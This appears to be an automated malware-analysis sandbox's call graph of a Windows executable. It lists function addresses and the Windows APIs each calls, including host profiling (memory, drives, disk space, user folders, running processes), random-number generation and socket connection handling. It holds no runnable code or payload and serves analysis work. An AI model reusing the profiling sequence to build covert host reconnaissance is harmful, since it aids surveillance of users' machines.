90022 c9a6b0 90021->90022 90023 b88f39 _write 90021->90023 90024 b88f53 _close 90021->90024 90025 c9a6c9 90022->90025 90026 c9a6ca CryptAcquireContextA 90022->90026 90023->90021 90023->90024 90024->90021 90025->89987 90027 c9a719 CryptGenRandom 90026->90027 90028 c9a701 90026->90028 90029 c9a73d 90027->90029 90030 c9a746 CryptReleaseContext 90027->90030 90028->89987 90029->90030 90031 c9a75d CryptReleaseContext 90029->90031 90030->90028 90031->90028 90033 c9820e 90032->90033 90034 c98232 90032->90034 90035 c9824c _errno 90033->90035 90036 c98216 realloc 90033->90036 90034->89996 90034->89997 90035->90034 90036->90034 91626 8ae940 20 API calls 90092 8c9740 90093 8c975d 90092->90093 90094 8c9780 90092->90094 90095 8c78a0 2 API calls 90093->90095 90096 8c9788 getenv 90094->90096 90097 8c9914 memset RegOpenKeyExA 90094->90097 90106 8c9763 90095->90106 90099 8c78a0 2 API calls 90096->90099 90098 8c995a RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen 90097->90098 90125 8c9812 90097->90125 90145 8c78a0 90098->90145 90100 8c979b 90099->90100 90102 8c97a6 _stat64 90100->90102 90100->90125 90103 8c97c7 90102->90103 90109 8c980b 90102->90109 90104 8c97f6 _stricmp 90103->90104 90105 8c97e2 _time64 90103->90105 90104->90109 90105->90104 90106->90096 90106->90102 90106->90125 90108 8c986e 90108->90125 90134 8c77b0 90108->90134 90109->90125 90133 8c5ca0 memset 90109->90133 90114 8c98a1 _time64 90115 8c78a0 2 API calls 90114->90115 90116 8c98bb 90115->90116 90116->90125 90154 8be2d0 memset _time64 90116->90154 90118 8c98d3 90118->90125 90155 8be2d0 memset _time64 90118->90155 90120 8c6d60 memcmp 90127 8c98e8 90120->90127 90121 8bd120 17 API calls 90121->90127 90123 8b4fe0 memset 90123->90127 90124 8be730 memset 90124->90127 90127->90120 90127->90121 90127->90123 90127->90124 90127->90125 90128 8c6320 memcpy 90127->90128 90129 8be3c0 memset strlen memcpy 90127->90129 90130 8c78a0 strlen memcpy 90127->90130 90131 8c9c3d _stricmp 90127->90131 90156 8bd190 90127->90156 90205 8be760 memset 90127->90205 90206 8be7c0 90127->90206 90128->90127 90129->90127 90130->90127 90131->90127 90133->90108 90135 8c7827 90134->90135 90136 8c77d7 fopen 90134->90136 90135->90125 90150 8b4fe0 90135->90150 90137 8c780e GetLastError 90136->90137 90138 8c77e9 fseek 90136->90138 90137->90135 90139 8c782f ftell 90138->90139 90140 8c7801 fclose 90138->90140 90139->90140 90141 8c783c fseek 90139->90141 90140->90135 90141->90140 90142 8c784f 90141->90142 90143 8c7866 fread 90142->90143 90144 8c787a 90142->90144 90143->90140 90143->90144 90144->90140 90146 8c78ae strlen 90145->90146 90147 8c78e1 90145->90147 90146->90147 90148 8c78bc 90146->90148 90147->90100 90148->90147 90149 8c78d6 memcpy 90148->90149 90149->90147 90151 8b4fec 90150->90151 90152 8b5003 90151->90152 90153 8b4ff3 memset 90151->90153 90152->90114 90152->90125 90153->90152 90154->90118 90155->90127 90157 8bd1ae 90156->90157 90163 8bd1fa 90156->90163 90158 8bd253 SetLastError 90157->90158 90210 8bd8f0 32 API calls 90157->90210 90161 8bd872 90158->90161 90161->90127 90162 8bd1e8 90162->90158 90194 8bd1f3 90162->90194 90165 8bd4f9 90163->90165 90166 8bd4b7 90163->90166 90168 8bd504 90165->90168 90219 8bd8f0 32 API calls 90165->90219 90211 8bd8f0 32 API calls 90166->90211 90174 8bd516 90168->90174 90220 8bd8f0 32 API calls 90168->90220 90169 8bd4ce 90176 8bd4e3 90169->90176 90212 8bd8f0 32 API calls 90169->90212 90172 8bd51f 90175 8bd52c 90172->90175 90222 8bd8f0 32 API calls 90172->90222 90174->90172 90221 8bd8f0 32 API calls 90174->90221 90180 8bd535 90175->90180 90223 8bd8f0 32 API calls 90175->90223 90177 8bd4f4 90176->90177 90213 8bd8f0 32 API calls 90176->90213 90186 8bd5bf 90177->90186 90214 8bd8f0 32 API calls 90177->90214 90190 8bd53e 90180->90190 90224 8bd8f0 32 API calls 90180->90224 90183 8bd547 90183->90162 90226 8bd8f0 32 API calls 90183->90226 90189 8bd5fb 90186->90189 90215 8bd8f0 32 API calls 90186->90215 90187 8bd87f 90187->90158 90228 8bd8f0 32 API calls 90187->90228 90198 8bd632 90189->90198 90216 8bd8f0 32 API calls 90189->90216 90190->90183 90190->90187 90192 8bd7fe 90190->90192 90225 8bd8f0 32 API calls 90192->90225 90227 8c78f0 strlen memcpy 90194->90227 90197 8bd8b6 90197->90158 90229 8c78f0 strlen memcpy 90197->90229 90199 8bd66e 90198->90199 90217 8bd8f0 32 API calls 90198->90217 90199->90162 90218 8bd8f0 32 API calls 90199->90218 90202 8bd8c5 90230 8c7890 strlen 90202->90230 90205->90127 90207 8be7db 90206->90207 90209 8be7e2 90206->90209 90208 8b4fe0 memset 90207->90208 90208->90209 90209->90127 90210->90162 90211->90169 90212->90176 90213->90177 90214->90186 90215->90189 90216->90198 90217->90199 90218->90162 90219->90168 90220->90174 90221->90172 90222->90175 90223->90180 90224->90190 90225->90183 90226->90162 90227->90161 90228->90197 90229->90202 90230->90162 91800 8e3340 197 API calls 91628 a2e170 44 API calls 91629 921140 60 API calls 90303 838b50 90304 838b6b 90303->90304 90343 838be6 90303->90343 90305 838bf3 90304->90305 90306 838b8f 90304->90306 90304->90343 90344 83a550 90305->90344 90461 816e40 11 API calls 90306->90461 90310 838ba1 90312 838cd9 SleepEx getsockopt 90310->90312 90314 838c99 90310->90314 90332 838bb5 90310->90332 90311 838ccf 90313 838e85 90311->90313 90317 83a150 75 API calls 90311->90317 90311->90343 90315 838d22 90312->90315 90316 838d18 WSAGetLastError 90312->90316 90324 838eae 90313->90324 90313->90343 90468 812a00 50 API calls 90313->90468 90314->90312 90318 838cb2 90314->90318 90315->90311 90323 838d43 90315->90323 90316->90315 90321 838dff WSASetLastError 90317->90321 90318->90311 90463 83b180 SleepEx getsockopt WSAGetLastError 90318->90463 90319 838c35 WSAGetLastError 90448 83a150 90319->90448 90320 838c1f connect 90320->90319 90321->90313 90327 838e1b 90321->90327 90325 81d8c0 2 API calls 90323->90325 90324->90343 90469 8078b0 closesocket 90324->90469 90330 838d4d 90325->90330 90327->90313 90466 81d090 66 API calls 90327->90466 90333 83a150 75 API calls 90330->90333 90331 838c8b 90331->90314 90334 838dc8 90331->90334 90336 838d66 90332->90336 90332->90343 90333->90336 90465 83b100 68 API calls 90334->90465 90336->90343 90464 8450a0 51 API calls 90336->90464 90337 838e67 90467 844fd0 51 API calls 90337->90467 90345 81d8c0 2 API calls 90344->90345 90346 83a575 90345->90346 90349 83a597 90346->90349 90474 8075e0 90346->90474 90348 83a6d9 90350 83a709 90348->90350 90370 83a713 90348->90370 90497 812a00 50 API calls 90348->90497 90349->90348 90487 83ef30 90349->90487 90355 8078b0 51 API calls 90350->90355 90350->90370 90352 838bfc 90352->90311 90352->90319 90352->90320 90352->90343 90354 83a63a 90356 83a641 90354->90356 90357 83a69b _errno _errno _errno 90354->90357 90355->90370 90358 83a650 setsockopt 90356->90358 90360 83a683 90356->90360 90495 81d090 66 API calls 90357->90495 90358->90360 90361 83a7e5 90358->90361 90360->90361 90499 844fd0 51 API calls 90360->90499 90365 83a8ee 90361->90365 90366 83a802 90361->90366 90362 83a6c9 90496 844f40 52 API calls 90362->90496 90371 83a962 getsockopt 90365->90371 90372 83a92a 90365->90372 90395 83a9ac 90365->90395 90368 83a811 setsockopt 90366->90368 90369 83a87c 90366->90369 90368->90369 90373 83a83b 90368->90373 90374 83ac6a 90369->90374 90378 83ac20 getsockopt 90369->90378 90379 83a8b9 90369->90379 90370->90352 90498 8450a0 51 API calls 90370->90498 90376 83a991 setsockopt 90371->90376 90377 83a984 90371->90377 90503 827620 11 API calls 90372->90503 90373->90369 90383 83a854 WSAGetLastError 90373->90383 90374->90395 90504 83b1e0 58 API calls 90374->90504 90376->90395 90377->90376 90377->90395 90384 83ac42 90378->90384 90385 83ac4f setsockopt 90378->90385 90502 827620 11 API calls 90379->90502 90382 83a945 90382->90371 90387 83a94c 90382->90387 90500 81d090 66 API calls 90383->90500 90384->90374 90384->90385 90385->90374 90386 83a8d4 90386->90378 90391 83a8df 90386->90391 90387->90395 90389 83af41 90494 8667e0 ioctlsocket 90389->90494 90391->90374 90392 83a86d 90501 844fd0 51 API calls 90392->90501 90393 83af56 90396 83afb9 WSAGetLastError 90393->90396 90397 83af5d 90393->90397 90395->90348 90395->90389 90398 83abe1 90395->90398 90399 83ab0a strlen 90395->90399 90396->90348 90397->90370 90400 83a150 75 API calls 90397->90400 90401 83aed3 htons 90398->90401 90402 83abee 90398->90402 90399->90398 90409 83ab22 90399->90409 90403 83af8f 90400->90403 90404 83aeeb bind 90401->90404 90402->90404 90405 83abf9 htons 90402->90405 90406 81d8c0 2 API calls 90403->90406 90407 83afcf 90404->90407 90415 83af03 90404->90415 90408 83ac0c 90405->90408 90406->90370 90410 83b056 WSAGetLastError 90407->90410 90417 83aff8 htons bind 90407->90417 90514 844fd0 51 API calls 90407->90514 90408->90404 90411 83ae32 90409->90411 90412 83acb8 90409->90412 90416 83abb9 90409->90416 90515 81d090 66 API calls 90410->90515 90411->90416 90511 844fd0 51 API calls 90411->90511 90412->90348 90412->90416 90423 83acdc WSAGetLastError 90412->90423 90413 83af33 90413->90389 90415->90413 90513 844fd0 51 API calls 90415->90513 90425 83adea WSAGetLastError 90416->90425 90432 83ad45 90416->90432 90445 83adc5 90416->90445 90506 836be0 160 API calls 90416->90506 90417->90407 90417->90415 90418 83b07b 90516 844f40 52 API calls 90418->90516 90421 83ade6 90421->90425 90505 81d090 66 API calls 90423->90505 90509 81d090 66 API calls 90425->90509 90426 83aeb8 90512 8645c0 12 API calls 90426->90512 90427 83ae8e 90427->90404 90431 83ae93 strchr 90427->90431 90435 83aead 90431->90435 90432->90421 90440 83ad5f 90432->90440 90434 83b08b 90434->90348 90517 8645c0 12 API calls 90435->90517 90436 83ad01 90510 844f40 52 API calls 90436->90510 90437 83aecc 90437->90401 90437->90404 90438 83adb7 90508 853030 50 API calls 90438->90508 90440->90438 90507 844fd0 51 API calls 90440->90507 90443 83b0bf 90443->90408 90446 83b0ca htons 90443->90446 90445->90348 90445->90426 90445->90427 90446->90408 90447 83b0e5 strtoul 90446->90447 90447->90408 90449 83a15f 90448->90449 90460 838c4d 90448->90460 90450 83a181 getsockname 90449->90450 90449->90460 90451 83a1d0 WSAGetLastError 90450->90451 90452 83a1f7 90450->90452 90522 81d090 66 API calls 90451->90522 90454 83ef30 51 API calls 90452->90454 90456 83a20f 90454->90456 90455 83a1eb 90524 844f40 52 API calls 90455->90524 90457 83a216 _errno _errno 90456->90457 90456->90460 90523 81d090 66 API calls 90457->90523 90460->90331 90462 8450a0 51 API calls 90460->90462 90461->90310 90462->90331 90463->90311 90464->90343 90465->90311 90466->90337 90467->90313 90468->90324 90470 8078c5 90469->90470 90471 8078dc 90469->90471 90525 8072a0 50 API calls 90470->90525 90471->90343 90473 8078d7 90473->90471 90475 807607 socket 90474->90475 90476 8075ef 90474->90476 90477 80762b 90475->90477 90478 80763f 90475->90478 90476->90475 90479 807601 90476->90479 90480 807643 90476->90480 90518 8072a0 50 API calls 90477->90518 90478->90349 90479->90475 90519 8072a0 50 API calls 90480->90519 90482 80763a 90482->90478 90484 807654 __acrt_iob_func 90520 80cb20 78 API calls 90484->90520 90486 807674 fflush _errno 90486->90349 90488 83efa8 90487->90488 90492 83ef47 90487->90492 90490 83efc0 90488->90490 90521 80c960 49 API calls 90488->90521 90490->90354 90491 83ef66 _errno 90491->90354 90492->90491 90493 83ef96 htons 90492->90493 90493->90490 90494->90393 90495->90362 90496->90348 90497->90350 90498->90352 90499->90361 90500->90392 90501->90369 90502->90386 90503->90382 90504->90395 90505->90436 90506->90432 90507->90438 90508->90445 90509->90436 90510->90348 90511->90416 90512->90437 90513->90413 90514->90407 90515->90418 90516->90434 90517->90443 90518->90482 90519->90484 90520->90486 90521->90490 90522->90455 90523->90455 90524->90460 90525->90473 91630 a33170 24 API calls 91632 95d940 22 API calls 91633 a74d70 47 API calls 91803 803357 130 API calls 91634 a90170 58 API calls 90609 8b8b50 90610 8b8b60 90609->90610 90612 8b8b88 90610->90612 90633 8c8e70 90610->90633 90638 8c88b0 QueryPerformanceFrequency QueryPerformanceCounter 90612->90638 90614 8b8b9a 90618 8b8c32 90614->90618 90640 8b7820 90614->90640 90616 8b8bc6 90616->90618 90649 8c4530 90616->90649 90619 8b8c2b 90619->90618 90620 8b8cb5 90619->90620 90678 8b8db0 13 API calls 90619->90678 90621 8be7c0 memset 90620->90621 90622 8b8cf2 90621->90622 90624 8b8d40 90622->90624 90656 8be600 90622->90656 90677 8b6e90 memset memset 90624->90677 90625 8b8d83 90625->90620 90627 8b8d8d 90625->90627 90679 8b6e90 memset memset 90627->90679 90629 8b8d1a 90660 8b6050 90629->90660 90634 8c8ea7 90633->90634 90635 8c8e80 90633->90635 90634->90610 90680 8c8d60 9 API calls 90635->90680 90637 8c8e95 90637->90634 90639 8c88f2 90638->90639 90639->90614 90641 8b784c 90640->90641 90645 8b78f8 90640->90645 90642 8b78bc 90641->90642 90644 8b78c0 90641->90644 90641->90645 90647 8b7877 90641->90647 90683 8b7960 memset memmove memcpy strlen 90642->90683 90644->90642 90682 8bf400 memset memset 90644->90682 90645->90616 90647->90642 90681 8bf400 memset memset 90647->90681 90650 8c455e 90649->90650 90651 8c4579 90649->90651 90684 8c4c20 10 API calls 90650->90684 90651->90619 90653 8c4572 90653->90651 90685 8c17d0 90653->90685 90655 8c458e 90655->90619 90657 8b8d13 90656->90657 90658 8be60d 90656->90658 90657->90624 90657->90629 90658->90657 90713 8ccd70 memset 90658->90713 90661 8b60d9 90660->90661 90714 8caa30 90661->90714 90665 8b64a4 90753 8bf400 memset memset 90665->90753 90667 8b64c7 90668 8b6506 90667->90668 90670 8b68df 90667->90670 90754 8cc320 QueryPerformanceFrequency QueryPerformanceCounter 90668->90754 90672 8b6050 60 API calls 90670->90672 90671 8b6515 90755 8bf400 memset memset 90671->90755 90673 8b68d2 90672->90673 90673->90618 90675 8b652f 90756 8c8880 WakeAllConditionVariable 90675->90756 90678->90625 90680->90637 90681->90647 90682->90644 90683->90645 90684->90653 90686 8c1918 90685->90686 90687 8c1801 90685->90687 90686->90655 90687->90686 90704 8c2cb0 memset 90687->90704 90689 8c1911 90689->90686 90690 8c1990 90689->90690 90705 8c31b0 memset 90689->90705 90690->90686 90692 8c19ab 90690->90692 90706 8c31b0 memset 90690->90706 90692->90686 90696 8c19ca 90692->90696 90707 8c31b0 memset 90692->90707 90696->90686 90697 8c1a76 90696->90697 90708 8ce3e0 memset memmove memcpy 90696->90708 90709 8c2f90 strlen memcpy 90696->90709 90697->90686 90698 8c1a9f 90697->90698 90710 8c1b30 memset memmove memcpy strlen memcpy 90697->90710 90698->90686 90703 8c1ac8 90698->90703 90711 8c1b30 memset memmove memcpy strlen memcpy 90698->90711 90703->90686 90712 8c1b30 memset memmove memcpy strlen memcpy 90703->90712 90704->90689 90705->90690 90706->90692 90707->90696 90708->90696 90709->90696 90710->90697 90711->90698 90712->90703 90713->90657 90715 8caa5f 90714->90715 90751 8b62fc 90715->90751 90757 8be730 90715->90757 90718 8caabf 90720 8caacd htons 90718->90720 90727 8cab0e 90718->90727 90719 8cab18 htons 90721 8cab58 90719->90721 90720->90721 90722 8cab96 socket 90721->90722 90723 8cab75 90721->90723 90722->90723 90722->90727 90724 8cabd0 ioctlsocket 90723->90724 90723->90727 90741 8cad2e 90723->90741 90725 8cabef setsockopt 90724->90725 90726 8cac10 90724->90726 90725->90726 90725->90727 90728 8cac16 setsockopt 90726->90728 90729 8cac37 90726->90729 90730 8cae6e closesocket 90727->90730 90727->90751 90728->90727 90728->90729 90731 8cac7a 90729->90731 90733 8cad04 90729->90733 90737 8cac57 htonl 90729->90737 90730->90751 90732 8cace7 setsockopt 90731->90732 90734 8cac9d 90731->90734 90732->90733 90735 8cad0a setsockopt 90733->90735 90733->90741 90738 8cacc6 bind 90734->90738 90735->90727 90735->90741 90736 8cada0 connect 90739 8cadb3 WSAGetLastError 90736->90739 90737->90738 90738->90727 90740 8cacdd 90738->90740 90739->90727 90739->90741 90740->90732 90740->90733 90741->90727 90741->90736 90741->90739 90742 8cade1 90741->90742 90742->90727 90760 8caf70 90742->90760 90745 8caeaf 90763 8be760 memset 90745->90763 90746 8cae9f 90747 8be7c0 memset 90746->90747 90749 8caea6 90747->90749 90749->90727 90764 8be180 memset 90749->90764 90752 8b6d50 43 API calls 90751->90752 90752->90665 90753->90667 90754->90671 90755->90675 90756->90673 90758 8b4fe0 memset 90757->90758 90759 8be737 90758->90759 90759->90718 90759->90719 90759->90727 90761 8caf93 getsockname 90760->90761 90762 8cae21 90760->90762 90761->90762 90762->90727 90762->90745 90762->90746 90763->90749 90764->90727 91635 8c6550 memcpy 91804 ac2370 51 API calls 90765 80255d 90766 b89f70 90765->90766 90767 80256c GetSystemInfo 90766->90767 90768 c929f0 malloc 90767->90768 90769 802589 90768->90769 90770 c92be0 13 API calls 90769->90770 90771 8025a0 GlobalMemoryStatusEx 90770->90771 90772 c929f0 malloc 90771->90772 90773 8025ec 90772->90773 90774 c92be0 13 API calls 90773->90774 90775 802603 GetLogicalDriveStringsA 90774->90775 90776 802626 90775->90776 90777 80277c 90775->90777 90778 c927f0 5 API calls 90776->90778 90780 c929f0 malloc 90777->90780 90779 80262b 90778->90779 90782 802762 90779->90782 90783 80263c GetDriveTypeA 90779->90783 90781 8027bf 90780->90781 90784 c92be0 13 API calls 90781->90784 90787 c92be0 13 API calls 90782->90787 90785 802743 strlen 90783->90785 90786 802655 GetDiskFreeSpaceExA 90783->90786 90788 8027d6 KiUserCallbackDispatcher 90784->90788 90785->90779 90786->90785 90807 80268b 90786->90807 90787->90777 90790 8027f8 90788->90790 90789 c92ac0 7 API calls 90789->90807 90791 c929f0 malloc 90790->90791 90793 802809 90791->90793 90794 c92be0 13 API calls 90793->90794 90796 802820 90794->90796 90795 c92be0 13 API calls 90795->90807 90797 c929f0 malloc 90796->90797 90799 80282b 90797->90799 90798 c928e0 malloc 90798->90807 90800 c92be0 13 API calls 90799->90800 90801 802842 SHGetKnownFolderPath wcscpy wcscat FindFirstFileW 90800->90801 90802 802906 FindNextFileW 90801->90802 90803 802928 90801->90803 90802->90802 90802->90803 90804 c929f0 malloc 90803->90804 90805 80293d 90804->90805 90806 c92be0 13 API calls 90805->90806 90808 802954 K32EnumProcesses 90806->90808 90807->90785 90807->90789 90807->90795 90807->90798 90818 c92b50 strlen 90807->90818 90809 8029a9 90808->90809 90810 80297b 90808->90810 90814 c929f0 malloc 90809->90814 90811 c929f0 malloc 90810->90811 90812 802992 90811->90812 90813 c92be0 13 API calls 90812->90813 90813->90809 90815 8029e0 90814->90815 90816 c92be0 13 API calls 90815->90816 90817 8029f7 90816->90817 90822 803d5e 90826 803d30 90822->90826 90823 803d90 90831 80fcb0 91 API calls 90823->90831 90826->90822 90826->90823 90828 810ab0 90826->90828 90827 803dc1 90832 8105b0 90828->90832 90831->90827 90837 8107c7 90832->90837 90844 8105bd 90832->90844 90833 8107ce 90871 817380 50 API calls 90833->90871 90836 8107ef 90864 813000 90836->90864 90837->90826 90841 81075f getsockopt 90847 8106f0 90841->90847 90842 810802 90846 810a2f 90842->90846 90848 810861 WSAWaitForMultipleEvents 90842->90848 90872 816fa0 90842->90872 90843 81066a 90843->90833 90843->90847 90870 8173b0 83 API calls 90843->90870 90844->90833 90844->90837 90844->90843 90868 8103c0 52 API calls 90844->90868 90869 817450 83 API calls 90844->90869 90845 810707 WSAEventSelect 90845->90833 90845->90847 90846->90833 90891 812f10 QueryPerformanceCounter GetTickCount 90846->90891 90847->90836 90847->90841 90847->90845 90850 8076a0 84 API calls 90847->90850 90856 810854 90848->90856 90850->90847 90853 8108c8 WSAEnumNetworkEvents 90853->90856 90854 810a19 WSAResetEvent 90854->90846 90855 810a6b 90855->90833 90857 810a87 90855->90857 90856->90853 90858 810928 WSAEventSelect 90856->90858 90863 810970 90856->90863 90892 816df0 Sleep WSASetLastError 90857->90892 90858->90856 90860 810a94 90860->90833 90861 8109e8 WSAEnumNetworkEvents 90862 8109d0 WSAEventSelect 90861->90862 90861->90863 90862->90861 90862->90863 90863->90854 90863->90861 90863->90862 90865 813018 90864->90865 90867 813031 90864->90867 90866 81d8c0 2 API calls 90865->90866 90865->90867 90866->90867 90867->90842 90868->90844 90869->90844 90870->90843 90871->90837 90873 816fd4 90872->90873 90874 816feb 90872->90874 90873->90874 90876 81701b 90873->90876 90875 810847 90874->90875 90877 817186 WSASetLastError 90874->90877 90878 816fff Sleep 90874->90878 90875->90833 90875->90848 90875->90856 90879 8171aa 90876->90879 90881 817176 90876->90881 90877->90875 90878->90875 90880 81730b 90879->90880 90883 817331 WSASetLastError 90879->90883 90884 8171cc Sleep 90879->90884 90880->90875 90882 817312 WSAGetLastError 90880->90882 90885 817207 select 90881->90885 90882->90875 90883->90875 90883->90880 90884->90875 90886 8171ec 90884->90886 90885->90880 90890 817233 90885->90890 90886->90882 90887 81726b __WSAFDIsSet 90888 81729a __WSAFDIsSet 90887->90888 90887->90890 90889 8172ba __WSAFDIsSet 90888->90889 90888->90890 90889->90890 90890->90875 90890->90887 90890->90888 90890->90889 90891->90855 90892->90860 91805 8e8b50 302 API calls 91636 801160 158 API calls 91807 81e760 178 API calls 91808 a41b40 52 API calls 91809 959370 81 API calls 91638 972570 23 API calls 91810 8f9360 49 API calls 91643 820970 87 API calls 91644 976960 22 API calls 91811 98cf60 37 API calls 91324 c90730 91325 c9075a 91324->91325 91326 c90766 91325->91326 91327 b88f70 8 API calls 91325->91327 91328 c9076f 91327->91328 91342 b912c0 91328->91342 91331 c907a6 91332 b88f70 8 API calls 91333 c907af GetVersion CryptAcquireContextA 91332->91333 91334 c90850 GetLastError __acrt_iob_func 91333->91334 91335 c90806 CryptGenRandom CryptReleaseContext 91333->91335 91346 b8b500 42 API calls 91334->91346 91336 c90890 GetLastError __acrt_iob_func 91335->91336 91337 c90844 91335->91337 91347 b8b500 42 API calls 91336->91347 91340 c90879 _time32 91341 c908b9 91341->91340 91343 b912cc 91342->91343 91348 b8e050 91343->91348 91345 b912fa 91345->91331 91345->91332 91346->91340 91347->91341 91349 b8e09d localeconv localeconv 91348->91349 91350 b8f886 _errno 91348->91350 91353 b8e0ce 91349->91353 91435 b8e503 91350->91435 91351 b8f993 91356 b8f9b5 realloc 91351->91356 91398 b8e214 91351->91398 91352 b8e300 strlen 91449 b97a50 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 91352->91449 91353->91352 91355 b8e146 isspace 91353->91355 91358 b8f674 91353->91358 91360 b8e176 isspace 91353->91360 91361 b8e18e 91353->91361 91363 b8e243 91353->91363 91367 b8f54c 91353->91367 91374 b8e388 91353->91374 91388 b8e560 isspace 91353->91388 91389 b8e582 91353->91389 91353->91435 91355->91353 91356->91398 91357 b8e28c 91359 b8e2d1 91357->91359 91364 b8e2c0 free 91357->91364 91362 b8e1e1 91358->91362 91372 b8f6b0 free 91358->91372 91358->91398 91365 b8e2f1 free 91359->91365 91366 b8e2e1 free 91359->91366 91360->91353 91368 b8ed90 ungetc 91361->91368 91369 b8e1a6 91361->91369 91370 b8e1f1 free 91362->91370 91371 b8e205 free 91362->91371 91363->91357 91373 b8e261 isspace 91363->91373 91364->91359 91364->91364 91365->91398 91366->91365 91376 b90250 ungetc 91367->91376 91377 b8f564 91367->91377 91368->91398 91369->91362 91383 b8e1d0 free 91369->91383 91370->91371 91371->91398 91372->91362 91372->91372 91373->91363 91428 b8e26f 91373->91428 91375 b8f5b6 91374->91375 91394 b8e4b0 91374->91394 91375->91362 91393 b8f5d0 free 91375->91393 91384 b90274 strtoul 91376->91384 91377->91362 91391 b8f5a0 free 91377->91391 91377->91398 91378 b90178 91378->91362 91381 b90184 free 91378->91381 91379 b8f603 91379->91362 91380 b8f630 free 91379->91380 91379->91398 91380->91362 91380->91380 91381->91362 91381->91381 91382 b8ecc8 _errno _errno 91382->91394 91383->91362 91383->91383 91384->91398 91384->91435 91385 b8fed7 tolower 91385->91398 91385->91435 91386 b8ed17 _errno 91386->91379 91386->91394 91387 b8feb6 isxdigit 91387->91435 91388->91353 91389->91362 91389->91398 91401 b8e5a0 free 91389->91401 91390 b90742 ungetc 91390->91357 91391->91362 91391->91391 91392 b8eb52 91404 b8eb63 91392->91404 91405 b8e81a 91392->91405 91393->91362 91393->91393 91394->91378 91394->91379 91394->91382 91394->91386 91394->91392 91395 b8ed02 isspace 91394->91395 91396 b8e527 91394->91396 91403 b8e6b9 91394->91403 91411 b900b8 ungetc 91394->91411 91394->91435 91395->91394 91400 b8e626 _errno 91395->91400 91396->91362 91410 b8e538 free 91396->91410 91397 b8e765 91397->91398 91414 b908f9 91397->91414 91397->91435 91398->91345 91399 b903d9 tolower 91399->91435 91400->91394 91401->91362 91401->91401 91402 b911a4 ungetc 91402->91435 91403->91397 91403->91398 91412 b8e701 malloc 91403->91412 91403->91435 91404->91398 91407 b8ebac malloc 91404->91407 91404->91435 91405->91398 91408 b8e86d malloc 91405->91408 91405->91435 91406 b90438 tolower 91406->91398 91406->91435 91407->91398 91415 b8ebd2 91407->91415 91408->91398 91416 b8e897 91408->91416 91409 b90927 91409->91362 91409->91398 91422 b90958 free 91409->91422 91410->91362 91410->91410 91411->91394 91412->91398 91419 b8e71f 91412->91419 91413 b908d7 ungetc 91413->91435 91414->91362 91414->91398 91426 b90911 free 91414->91426 91421 b8ebe6 malloc 91415->91421 91427 b8e8c7 91415->91427 91423 b8e8ab malloc 91416->91423 91416->91427 91417 b8ea53 malloc 91417->91398 91417->91427 91418 b8eb2d isspace 91418->91435 91425 b8e733 malloc 91419->91425 91431 b8e74f 91419->91431 91420 b8e7ac isspace 91420->91435 91421->91427 91422->91362 91422->91422 91423->91427 91424 b8e96f realloc 91424->91435 91425->91431 91426->91362 91426->91426 91429 b8ea85 malloc 91427->91429 91427->91435 91428->91357 91428->91390 91429->91427 91430 b90e3e ungetc 91430->91435 91431->91397 91432 b978b0 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 91432->91435 91433 b8f293 strtoll 91433->91398 91433->91435 91434 b8fc5e strtol 91434->91398 91434->91435 91435->91350 91435->91351 91435->91358 91435->91376 91435->91384 91435->91385 91435->91387 91435->91396 91435->91398 91435->91399 91435->91402 91435->91406 91435->91409 91435->91413 91435->91417 91435->91418 91435->91420 91435->91424 91435->91428 91435->91430 91435->91432 91435->91433 91435->91434 91437 b90d20 _errno 91435->91437 91438 b8ec9a realloc 91435->91438 91439 b90006 ungetc 91435->91439 91440 b90054 realloc 91435->91440 91441 b90e5d realloc 91435->91441 91442 b8fc10 realloc 91435->91442 91443 b8ed2c _errno 91435->91443 91444 b8ed5e _errno 91435->91444 91450 b8b1a0 7 API calls 91435->91450 91437->91435 91438->91435 91439->91435 91440->91435 91441->91435 91442->91435 91443->91362 91445 b8ed43 91443->91445 91444->91362 91447 b8ed75 91444->91447 91446 b8ed48 free 91445->91446 91446->91362 91446->91446 91448 b8ed78 free 91447->91448 91448->91362 91448->91448 91449->91353 91450->91435 91812 8b8f70 76 API calls 91645 80157c FreeLibrary 91815 8e3370 131 API calls
                            APIs
                              • Part of subcall function 0081D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,008101B1), ref: 0081D8E2
                            • setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 0083A670
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A6A1
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A6AB
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A6AF
                              • Part of subcall function 0081D090: GetLastError.KERNEL32 ref: 0081D0A1
                              • Part of subcall function 0081D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0A9
                              • Part of subcall function 0081D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0CD
                              • Part of subcall function 0081D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0D7
                              • Part of subcall function 0081D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0081D381
                              • Part of subcall function 0081D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0081D3A2
                              • Part of subcall function 0081D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D3BF
                              • Part of subcall function 0081D090: GetLastError.KERNEL32 ref: 0081D3C9
                              • Part of subcall function 0081D090: SetLastError.KERNEL32(00000000), ref: 0081D3D4
                              • Part of subcall function 00844F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00844F9E
                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0083A831
                            • WSAGetLastError.WS2_32 ref: 0083A854
                            • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0083A97A
                            • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0083A9A6
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0083AB0F
                            • htons.WS2_32(?), ref: 0083AC01
                            • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0083AC38
                            • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0083AC64
                            • WSAGetLastError.WS2_32 ref: 0083ACDC
